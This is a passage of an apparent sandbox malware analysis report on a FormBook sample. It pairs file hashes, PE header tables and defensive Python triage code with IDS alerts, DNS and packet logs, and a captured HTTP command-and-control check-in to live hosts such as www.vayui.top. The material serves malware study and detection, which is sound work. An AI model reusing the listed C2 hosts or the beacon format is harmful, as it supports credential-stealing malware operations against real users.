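    """Return a list of persistence indicators found in a Task Scheduler XML definition."""
    task = ET.fromstring(xml_text)
    findings = []

    # Every trigger child is reported unless it is explicitly disabled; the schema's
    # default for a missing <Enabled> is true, so absence counts as enabled.
    for trig in task.findall("t:Triggers/*", NS):
        name = trig.tag.split("}")[-1]
        if _text(trig, "t:Enabled").lower() != "false":
            findings.append("trigger:" + name)

    # Exec actions whose command sits in a user-writable directory.
    for cmd in task.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"').lower()
        if any(marker in path for marker in USER_WRITABLE):
            findings.append("user_writable_action:" + path)

    if _text(task, "t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        findings.append("runlevel:HighestAvailable")
    if _text(task, "t:Settings/t:StartWhenAvailable").lower() == "true":
        findings.append("start_when_available")
    return findings


if __name__ == "__main__":
    for finding in assess_task(SAMPLE_TASK_XML):
        print(finding)
```

On a live host the same function can be fed the output of `schtasks /query /tn <name> /xml`, or the files under C:\Windows\System32\Tasks, which hold the registered definitions in this same XML schema. Note that the principal here runs at LeastPrivilege, so the task is not an elevation primitive; it is purely a logon-time restart of the dropped copy.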
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):757248
                                              Entropy (8bit):7.772343266169615
                                              Encrypted:false
                                              SSDEEP:12288:2Jn6k+lXZJlSCg07Oq7gyRTjUidH+i/rdg7GZK5rO/Lztnm1my5usx+XtKJ:nkYXVS7Q7n/de9bd+zwxt
                                              MD5:3F10D9AE24F018B0CA90A3F5B4365C48
                                              SHA1:D19111D80986035ECD143BC04D0A46B600AA3E4B
                                              SHA-256:65990A23E7F833BE5F9A90B3A50DC246EC89FFDB4BCC1895C5FE4917438483CE
                                              SHA-512:E3C092BA40F73E87932F2454EE8EBF3CCC48ED16F6161243FDFFB5729A1D0D1000C839473EEA398CDE10036BE158CC8F51E2C70C23DB94886B8E4602B262A083
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0................. ........@.. ....................................@.....................................O...................................$...p............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........d...K......`....................................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.....*....0...........s......o.....*".(.....*.0...........s".....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0............o ....+..*.0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.772343266169615
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:C6Abn5cBei.exe
                                              File size:757'248 bytes
                                              MD5:3f10d9ae24f018b0ca90a3f5b4365c48
                                              SHA1:d19111d80986035ecd143bc04d0a46b600aa3e4b
                                              SHA256:65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce
                                              SHA512:e3c092ba40f73e87932f2454ee8ebf3ccc48ed16f6161243fdffb5729a1d0d1000c839473eea398cde10036be158cc8f51e2c70c23db94886b8e4602b262a083
                                              SSDEEP:12288:2Jn6k+lXZJlSCg07Oq7gyRTjUidH+i/rdg7GZK5rO/Lztnm1my5usx+XtKJ:nkYXVS7Q7n/de9bd+zwxt
                                              TLSH:B0F401682756DA02CAA5A7751EB2F1B517BC2EDEFA00D2174FC93DDBB86AF000D44253
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x4ba2d6
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xEE97DEC3 [Mon Nov 5 05:06:11 2096 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
add byte ptr [eax], al  (repeated 97 times: the zero padding that follows the 6-byte jmp stub, disassembled as x86)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xba284          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbc000          0x5a4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xbe000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xb8624          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type               Entropy              Characteristics
.text   0x2000           0xb82dc       0xb8400   ea47909d76c04d330d07019cf1e4bedb  False     0.9201193075814111  COM executable for DOS  7.779278383035423    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xbc000          0x5a4         0x600     71d23add3f0e8e141901693385f8d711  False     0.4205729166666667  data                    4.063134395683247    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xbe000          0xc           0x200     6c9160da8022936183ca5140d27dc39a  False     0.044921875         data                    0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xbc090  0x314  data                                                                                                  0.434010152284264
RT_MANIFEST  0xbc3b4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain
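The static fields above (link-time stamp, entry point, section table, data directories and the single import) are enough to explain two of the report's own findings without running the sample: the time stamp 0xEE97DEC3 decodes to November 2096, which is why the report flags a suspicious time stamp, and the entry point instruction `jmp dword ptr [00402000h]` reads its target from the one-slot IAT at RVA 0x2000, i.e. it is the ordinary native stub that hands control to mscoree!_CorExeMain in a .NET executable, which is also why the import hash is the generic .NET one. The Python below is an added example, not part of the Joe Sandbox report; the field values are copied from the tables above as constants and the lookup logic is generic.

```python
"""Static triage of the PE header values reported above.

Added example, not part of the Joe Sandbox report. Every constant below is
copied from the report's tables; the functions implement generic checks
(time stamp plausibility, RVA-to-section lookup, IAT slot resolution).
"""
from datetime import datetime, timezone

IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x4ba2d6
TIME_DATE_STAMP = 0xEE97DEC3
# Date the sample was observed (the report's analysis date).
ANALYSIS_DATE = datetime(2025, 1, 11, tzinfo=timezone.utc)

# Section table: name -> (virtual address RVA, virtual size)
SECTIONS = {
    ".text": (0x2000, 0xb82dc),
    ".rsrc": (0xbc000, 0x5a4),
    ".reloc": (0xbe000, 0xc),
}
# Non-empty data directories: name -> (RVA, size)
DATA_DIRECTORIES = {
    "IMPORT": (0xba284, 0x4f),
    "RESOURCE": (0xbc000, 0x5a4),
    "BASERELOC": (0xbe000, 0xc),
    "DEBUG": (0xb8624, 0x70),
    "IAT": (0x2000, 0x8),
    "COM_DESCRIPTOR": (0x2008, 0x48),
}
# Import table: one DLL, one function (IAT slot order).
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}


def timestamp_to_utc(stamp):
    """Decode the IMAGE_FILE_HEADER TimeDateStamp (seconds since the Unix epoch)."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def timestamp_is_suspicious(stamp, observed=ANALYSIS_DATE):
    """A link time later than the date the file was observed cannot be genuine."""
    return timestamp_to_utc(stamp) > observed


def rva_to_section(rva):
    """Name of the section whose virtual range covers rva, or None."""
    for name, (start, size) in SECTIONS.items():
        if start <= rva < start + size:
            return name
    return None


def directory_containing(rva):
    """Name of the data directory whose range covers rva, or None."""
    for name, (start, size) in DATA_DIRECTORIES.items():
        if start <= rva < start + size:
            return name
    return None


def resolve_entry_stub(jmp_operand_va):
    """Resolve the operand of the entry stub `jmp dword ptr [VA]`.

    If the operand points into the IAT, return the import held in that slot
    (32-bit PE, so slots are 4 bytes wide); otherwise return None.
    """
    rva = jmp_operand_va - IMAGE_BASE
    if directory_containing(rva) != "IAT":
        return None
    iat_start, iat_size = DATA_DIRECTORIES["IAT"]
    dll, funcs = next(iter(IMPORTS.items()))
    slot = (rva - iat_start) // 4
    if slot >= len(funcs) or rva + 4 > iat_start + iat_size:
        return None
    return f"{dll}!{funcs[slot]}"


def triage():
    """Summarise what the header alone tells us about this file."""
    return {
        "timestamp_utc": timestamp_to_utc(TIME_DATE_STAMP).isoformat(),
        "timestamp_suspicious": timestamp_is_suspicious(TIME_DATE_STAMP),
        "entry_section": rva_to_section(ENTRY_POINT_VA - IMAGE_BASE),
        "entry_stub_target": resolve_entry_stub(0x402000),
        "clr_header_present": "COM_DESCRIPTOR" in DATA_DIRECTORIES,
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Note that the entry point RVA 0xba2d6 plus the 6 bytes of `FF 25 00 20 40 00` lands exactly at the end of .text (0x2000 + 0xb82dc = 0xba2dc), which is why the disassembly listing above shows nothing but zero padding after the jmp: the real program logic is CIL in the section body, not native code at the entry point.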
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2025-01-11T05:21:51.967852+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.8  49712        172.67.145.234  80         TCP
2025-01-11T05:22:08.786803+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49713        43.199.54.158   80         TCP
2025-01-11T05:22:08.786803+0100  2856318  ETPRO MALWARE FormBook CnC Checkin (POST) M4  1         192.168.2.8  49713        43.199.54.158   80         TCP
2025-01-11T05:22:11.567999+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49714        43.199.54.158   80         TCP
2025-01-11T05:22:14.318121+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49727        43.199.54.158   80         TCP
2025-01-11T05:22:36.706516+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.8  49744        43.199.54.158   80         TCP
2025-01-11T05:22:42.651153+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49906        154.88.22.107   80         TCP
2025-01-11T05:22:45.210232+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49924        154.88.22.107   80         TCP
2025-01-11T05:22:47.764735+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49937        154.88.22.107   80         TCP
2025-01-11T05:22:50.301222+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.8  49955        154.88.22.107   80         TCP
2025-01-11T05:22:56.825316+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49988        154.23.184.95   80         TCP
2025-01-11T05:22:59.498294+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49989        154.23.184.95   80         TCP
2025-01-11T05:23:02.595856+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.8  49990        154.23.184.95   80         TCP
2025-01-11T05:23:05.129591+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.8  49991        154.23.184.95   80         TCP
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 11, 2025 05:21:51.330084085 CET  49712        80         192.168.2.8     172.67.145.234
Jan 11, 2025 05:21:51.335110903 CET  80           49712      172.67.145.234  192.168.2.8
Jan 11, 2025 05:21:51.337444067 CET  49712        80         192.168.2.8     172.67.145.234
Jan 11, 2025 05:21:51.385659933 CET  49712        80         192.168.2.8     172.67.145.234
Jan 11, 2025 05:21:51.390639067 CET  80           49712      172.67.145.234  192.168.2.8
Jan 11, 2025 05:21:51.966532946 CET  80           49712      172.67.145.234  192.168.2.8
Jan 11, 2025 05:21:51.967778921 CET  80           49712      172.67.145.234  192.168.2.8
Jan 11, 2025 05:21:51.967852116 CET  49712        80         192.168.2.8     172.67.145.234
Jan 11, 2025 05:21:51.970061064 CET  49712        80         192.168.2.8     172.67.145.234
Jan 11, 2025 05:21:51.974944115 CET  80           49712      172.67.145.234  192.168.2.8
Jan 11, 2025 05:22:07.069613934 CET  49713        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:07.255702972 CET  80           49713      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:07.255808115 CET  49713        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:07.271908045 CET  49713        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:07.276786089 CET  80           49713      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:08.786803007 CET  49713        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:08.834791899 CET  80           49713      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:09.852278948 CET  49714        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:09.857209921 CET  80           49714      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:09.857276917 CET  49714        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:10.060489893 CET  49714        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:10.065301895 CET  80           49714      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:11.567998886 CET  49714        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:11.614691019 CET  80           49714      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:12.736423016 CET  49727        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:12.741379023 CET  80           49727      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:12.741487980 CET  49727        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:12.801029921 CET  49727        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:12.805975914 CET  80           49727      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:12.806102991 CET  80           49727      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:14.318120956 CET  49727        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:14.370647907 CET  80           49727      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:15.337778091 CET  49744        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:15.342556000 CET  80           49744      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:15.342637062 CET  49744        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:15.354065895 CET  49744        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:15.360930920 CET  80           49744      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:28.643976927 CET  80           49713      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:28.644027948 CET  49713        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:31.217855930 CET  80           49714      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:31.217945099 CET  49714        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:34.140115976 CET  80           49727      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:34.140297890 CET  49727        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:36.706317902 CET  80           49744      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:36.706516027 CET  49744        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:36.719064951 CET  49744        80         192.168.2.8     43.199.54.158
Jan 11, 2025 05:22:36.724024057 CET  80           49744      43.199.54.158   192.168.2.8
Jan 11, 2025 05:22:41.752494097 CET  49906        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:41.757419109 CET  80           49906      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:41.757555008 CET  49906        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:41.773291111 CET  49906        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:41.778177977 CET  80           49906      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:42.651037931 CET  80           49906      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:42.651096106 CET  80           49906      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:42.651153088 CET  49906        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:43.292249918 CET  49906        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:44.306081057 CET  49924        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:44.310962915 CET  80           49924      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:44.311029911 CET  49924        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:44.326875925 CET  49924        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:44.331798077 CET  80           49924      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:45.209973097 CET  80           49924      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:45.210058928 CET  80           49924      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:45.210232019 CET  49924        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:45.833653927 CET  49924        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:46.851949930 CET  49937        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:46.856834888 CET  80           49937      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:46.860424995 CET  49937        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:46.874960899 CET  49937        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:46.879859924 CET  80           49937      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:46.879966021 CET  80           49937      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:47.764566898 CET  80           49937      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:47.764671087 CET  80           49937      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:47.764734983 CET  49937        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:48.380614996 CET  49937        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:49.399291992 CET  49955        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:49.405056953 CET  80           49955      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:49.405148983 CET  49955        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:49.415225983 CET  49955        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:49.420130968 CET  80           49955      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:50.301038027 CET  80           49955      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:50.301075935 CET  80           49955      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:50.301222086 CET  49955        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:50.304053068 CET  49955        80         192.168.2.8     154.88.22.107
Jan 11, 2025 05:22:50.308883905 CET  80           49955      154.88.22.107   192.168.2.8
Jan 11, 2025 05:22:55.925426006 CET  49988        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:55.930398941 CET  80           49988      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:55.930505991 CET  49988        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:56.061652899 CET  49988        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:56.066663980 CET  80           49988      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:56.825022936 CET  80           49988      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:56.825100899 CET  80           49988      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:56.825315952 CET  49988        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:57.583508968 CET  49988        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:58.603209019 CET  49989        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:58.608226061 CET  80           49989      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:58.608345985 CET  49989        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:58.624088049 CET  49989        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:22:58.628864050 CET  80           49989      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:59.498217106 CET  80           49989      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:59.498251915 CET  80           49989      154.23.184.95   192.168.2.8
Jan 11, 2025 05:22:59.498294115 CET  49989        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:00.661525965 CET  49989        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:01.680283070 CET  49990        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:01.685308933 CET  80           49990      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:01.685529947 CET  49990        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:01.700735092 CET  49990        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:01.705704927 CET  80           49990      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:01.705770016 CET  80           49990      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:02.595653057 CET  80           49990      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:02.595755100 CET  80           49990      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:02.595855951 CET  49990        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:03.208468914 CET  49990        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:04.227407932 CET  49991        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:04.232355118 CET  80           49991      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:04.232513905 CET  49991        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:04.242371082 CET  49991        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:04.247241020 CET  80           49991      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:05.129399061 CET  80           49991      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:05.129503012 CET  80           49991      154.23.184.95   192.168.2.8
Jan 11, 2025 05:23:05.129590988 CET  49991        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:05.132559061 CET  49991        80         192.168.2.8     154.23.184.95
Jan 11, 2025 05:23:05.137392044 CET  80           49991      154.23.184.95   192.168.2.8
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 11, 2025 05:21:51.308438063 CET  55919        53         192.168.2.8  1.1.1.1
Jan 11, 2025 05:21:51.320138931 CET  53           55919      1.1.1.1      192.168.2.8
Jan 11, 2025 05:22:07.035612106 CET  56418        53         192.168.2.8  1.1.1.1
Jan 11, 2025 05:22:07.048393965 CET  53           56418      1.1.1.1      192.168.2.8
Jan 11, 2025 05:22:41.728967905 CET  65068        53         192.168.2.8  1.1.1.1
Jan 11, 2025 05:22:41.745466948 CET  53           65068      1.1.1.1      192.168.2.8
Jan 11, 2025 05:22:55.321582079 CET  65010        53         192.168.2.8  1.1.1.1
Jan 11, 2025 05:22:55.877412081 CET  53           65010      1.1.1.1      192.168.2.8

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name             Type            Class        DNS over HTTPS
Jan 11, 2025 05:21:51.308438063 CET  192.168.2.8  1.1.1.1  0x67aa    Standard query (0)  www.vayui.top    A (IP address)  IN (0x0001)  false
Jan 11, 2025 05:22:07.035612106 CET  192.168.2.8  1.1.1.1  0x17b3    Standard query (0)  www.327531.buzz  A (IP address)  IN (0x0001)  false
Jan 11, 2025 05:22:41.728967905 CET  192.168.2.8  1.1.1.1  0xd077    Standard query (0)  www.cg19g5.pro   A (IP address)  IN (0x0001)  false
Jan 11, 2025 05:22:55.321582079 CET  192.168.2.8  1.1.1.1  0x18a2    Standard query (0)  www.hm35s.top    A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name             CName      Address         Type                    Class        DNS over HTTPS
Jan 11, 2025 05:21:51.320138931 CET  1.1.1.1    192.168.2.8  0x67aa    No error (0)  www.vayui.top               172.67.145.234  A (IP address)          IN (0x0001)  false
Jan 11, 2025 05:21:51.320138931 CET  1.1.1.1    192.168.2.8  0x67aa    No error (0)  www.vayui.top               104.21.95.160   A (IP address)          IN (0x0001)  false
Jan 11, 2025 05:22:07.048393965 CET  1.1.1.1    192.168.2.8  0x17b3    No error (0)  www.327531.buzz             43.199.54.158   A (IP address)          IN (0x0001)  false
Jan 11, 2025 05:22:41.745466948 CET  1.1.1.1    192.168.2.8  0xd077    No error (0)  www.cg19g5.pro              154.88.22.107   A (IP address)          IN (0x0001)  false
Jan 11, 2025 05:22:55.877412081 CET  1.1.1.1    192.168.2.8  0x18a2    No error (0)  www.hm35s.top    hm35s.top                  CNAME (Canonical name)  IN (0x0001)  false
Jan 11, 2025 05:22:55.877412081 CET  1.1.1.1    192.168.2.8  0x18a2    No error (0)  hm35s.top                   154.23.184.95   A (IP address)          IN (0x0001)  false
                                              • www.vayui.top
                                              • www.327531.buzz
                                              • www.cg19g5.pro
                                              • www.hm35s.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49712        172.67.145.234  80                5124  C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 05:21:51.385659933 CET  509                OUT        GET /7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx HTTP/1.1
                                              Host: www.vayui.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Jan 11, 2025 05:21:51.966532946 CET  923                IN         HTTP/1.1 404 Not Found
                                              Date: Sat, 11 Jan 2025 04:21:51 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMkFGydQEVcX%2FI72bpSlfhYmwMFAukZfdDVw01szeT4gepTsJezfmdSYCBPb%2Bw1NbyF%2FU8ciYdQ9pFM7%2BstEiHLAFqGEJAfnXlUALxS8VRsAkO%2F2DVsmpZm5iHlKcU05"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 90021f568bdc4240-EWR
                                              alt-svc: h3=":443"; ma=86400
